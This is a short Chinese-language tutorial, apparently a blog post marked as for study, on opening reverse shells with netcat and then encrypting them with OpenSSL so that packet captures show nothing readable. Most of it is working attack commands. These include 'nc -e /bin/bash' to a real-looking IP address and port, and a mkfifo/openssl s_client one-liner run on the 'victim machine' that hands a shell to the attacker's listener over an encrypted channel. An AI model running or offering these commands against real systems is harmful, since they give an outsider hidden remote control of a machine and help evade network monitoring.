免责声明:本节仅做技术交流与学习...
目录
介绍:
用法:
未加密--流量抓包
加密:
攻击端
靶机
抓包分析:
介绍:
nc 是一个Linux环境下常用的工具命令,可以用来帮助开发者查询和解决网路问题,通常被认为是 NetCat 工具的缩写,在网络工具中有“瑞士军刀”的美誉。
nc 在Linux环境下常常是自带的,如果你使用的Linux发行版本没有这个工具也可以自行安装,比如在CentOS上的安装命令就是 yum install nc -y,并且这个工具在Windows上也可以直接下载使用,下载页面地址为 netcat,简约而不简单。
用法:
nc -lvvp 5566
nc -e /bin/bash 47.94.236.117 5566
nc -e cmd ip port
nc -lvvp port
https://www.cnblogs.com/someone9/p/8667117.html
linux学习之nc工具操作_慕课手记
网络工具nc的常见功能和用法-CSDN博客
未加密--流量抓包
nc -lvvp 5566
nc -e /bin/bash 47.94.236.117 5566
加密:
攻击端
生成自签名证书 :
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
--全部回车--(全部默认)监听指定端口,这里我选择 8888 :
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
---监听---上线---执行命令
靶机
在受害机上执行 shell 反弹命令(注意修改 ip 和端口)
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.94.236.117:8888 > /tmp/s; 
抓包分析:
---数据都被加密了.
